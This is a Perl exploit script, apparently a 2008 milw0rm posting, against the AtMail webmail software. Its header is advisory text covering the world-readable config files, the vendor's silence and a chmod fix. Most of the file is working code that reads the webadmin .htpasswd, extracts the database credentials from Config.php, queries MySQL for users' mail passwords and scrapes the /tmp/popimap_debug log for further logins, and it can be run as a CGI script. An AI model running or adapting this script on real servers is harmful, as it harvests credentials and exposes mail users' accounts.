#!/usr/bin/perl ################################################################################ # # LEGAL: # Permission is granted to freely reproduce this document in its entirety # under the condition that the contents are not altered in any way. # milw0rm IS permitted to add their standard footer: // milw0rm.com / date # Permission to view or reproduce this file is NOT granted to any # individual with the first name Gadi and the last name Evron, due to the # prior history of at least 1 individual with this name of making false # claims that researchers notified them about recently released exploits. # # PRODUCT: # AtMail - atmail.com # # VENDOR: # CalaCode - calacode.com # # DOWNLOAD: # http://atmail.org/download/atmailopen.tgz # http://atmail.com/demo/atmailphpdemo.tgz # # PROBLEM: # World readable files in the default install lead to sensitive # information disclosure, loss of integrity. # # SOLUTION: # chmod 640 /path/to/Config.php /path/to/.htpasswd # # NOTIFICATION: # 5/27/2008 - Several emails were sent back and forth, explaining how the # world readable Config.php issue could be abused. Multiple subsequent # attempts to obtain a status update from the vendor were unreplied to. # It's now 07/29/2008. Instead of taking a few moments of their time to # bring the level of security of the servers this software is installed # on back up to the same level it was BEFORE this software was installed # (excluding any other vulnerabilities that may exist in this software), # the vendor is happily pushing their product at HostingCon at this time. # (JULY 28-30, 2008). # # STATUS: # Not fixed. # # USAGE: # ./atmail.pl # # or simply use it as a CGI script. The vendor claims that ssh access is # required to abuse this issue. What they really mean is that all someone # needs is the ability to invoke a few commands from the shell. This is # easily done in countless ways without requiring authentication via ssh. # # +----------------------------------------------------+ # | WEBADMIN USER CREDENTIALS (.htpasswd) | # +----------------------------------------------------+ # admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0 # # +----------------------------------------------------+ # | DATABASE CREDENTIALS (Config.php) | # +----------------------------------------------------+ # USER: atmail # PASS: AF4hubB493 # HOST: localhost # # +----------------------------------------------------+ # | CLIENT CREDENTIALS (MySQL) | # +----------------------------------------------------+ # USER: alice@atmail.com PASS: atmail # USER: bob@atmail.com PASS: doesn't # USER: carol@atmail.com PASS: getit # # +----------------------------------------------------+ # | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) | # +----------------------------------------------------+ # USER: alice PASS: atmail # USER: bob PASS: doesn't # USER: carol PASS: getit # # # ADDED BONUS: client information persists in the database even after the user # has logged off. # # To make this code work, you must fill in the paths. I don't condone # malicious use of the information provided in this script, just as I don't # condone vendor complacency. # # If you have found any of this information to be useful to you or someone # you know, PLEASE consider donating to the Julie Amero Defense Fund: # # Official Blog # http://julieamer.blogspot.com # # Trial Transcript # http://julieamero.blogspot.com # # http://google.com/search?q=julie+amero # # and/or contacting news outlets, state legislators, the prosecution, etc and # letting them know your thoughts in a polite and professional manner. # ################################################################################ # print "Content-type: text/plain\n\n"; use strict; use warnings; my $atmail_path = shift || ''; my $atmail_htpasswd_path = $atmail_path . ''; my $atmail_config_path = $atmail_path . ''; my $atmail_popimap_debug = ''; my ( $sql_user, $sql_pass, $sql_host ); -e $atmail_path or die "$atmail_path does not exist\n"; ############################################################################### # For logging into https://example.com/atmail/webadmin ############################################################################### if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path ) { print_line(); print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n"; print_line(); while ( <$atmail_htpasswd_path_fh> ) { print; } close $atmail_htpasswd_path_fh; print "\n"; } ############################################################################### # For accessing the atmail db ############################################################################### if ( open my $atmail_config_fh, '<', $atmail_config_path ) { print_line(); print "|\tDATABASE CREDENTIALS (Config.php) |\n"; print_line(); while ( <$atmail_config_fh> ) { $sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms ); $sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms ); $sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms ); } close $atmail_config_fh; print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n"; print "\n"; } ############################################################################### # For reading grandma's email ############################################################################### my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'"; if ( open my $mysql_fh, '-|', $sessions ) { print_line(); print "|\tCLIENT CREDENTIALS (MySQL) |\n"; print_line(); while ( <$mysql_fh> ) { if ( m{ Account: \s (\S+) }xms ) { print "USER: $1\t"; } elsif ( m{ Password: \s (\S+) }xms ) { print "PASS: $1\n"; } } close $mysql_fh; print "\n"; } ############################################################################### # Debugging is not enabled by default, and you do have the choice of # configuring the location of the debug log. The default is /tmp/popimap_debug # which also presents a symlink attack issue if left to the default setting. ############################################################################### if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' ) { my %accounts; print_line(); print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n"; print_line(); my ( $popimap_debug_user, $popimap_debug_pass ); while ( <$popimap_debug_fh> ) { if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) { $accounts{$1} = $2; } } close $popimap_debug_fh; while ( my ( $user, $pass ) = each ( %accounts ) ) { print "USER: $user\tPASS: $pass\n"; } print "\n"; } sub print_line { print "+----------------------------------------------------+\n"; }